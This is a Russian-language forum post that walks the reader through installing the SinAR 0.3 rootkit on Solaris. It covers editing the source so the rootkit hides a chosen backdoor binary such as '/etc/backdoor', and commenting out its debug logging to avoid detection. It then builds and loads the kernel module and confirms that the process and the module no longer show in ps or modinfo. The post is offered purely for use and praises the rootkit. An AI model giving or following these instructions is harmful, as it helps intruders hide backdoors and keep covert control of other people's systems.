По поводу SinAR 0.3 для Solaris приведу небольшой мануал по установке и эксплуатации
1) сливаем сам руткит с
packetstormsecurity.org
2) распаковываем и открываем исходник в любимом редакторе для редактирования:
tar -xjf SInAR-0.3.tar.bz2 -C ./SinAR
cd ./SinAR/src
vim ./sinar.c
3) ищем строки:
#define RK_EXEC_KEY "./sinarrk"
#define RK_EXEC_KEY_LEN 9
и заменяем их на имя бинарника, который необходимо скрывать в системе во время его запуска, например так:
#define RK_EXEC_KEY "/etc/backdoor"
#define RK_EXEC_KEY_LEN 13
4) Все строки, содержащие cnm_err закомментируем, дабы не выдавать своё присутствие в системе (эта функция выводит логи в системный журнал для отладки) и сохраняем сырец
5) выполняем
make all в папке с сырцом (собираем модуль)
6) загружаем модуль
modload ./sinar (путь к модулю, предварительно рекомендую спрятать)
7)запускаем необходимый бинарник и НЕ наблюдаем его в списке
ps
8)запукаем
modinfo | grep sinaк и НЕ наблюдаем такого модуля
9)далее всё зависит от вашей фантазии, но учтите что SinAR не умеет скрывать ничего кроме самого себя и одного процесса + всех его потомков в системе (точнее нескольких процессов, созданных одним бинарником). Файлы придётся прятать чем-нибудь другим (или руками). По личному опяту синар является лучшим руткитом для солярки впринципе и его функциональностью вполне можно обходиться.
Надеюсь на этом тема SinAR исчерпана.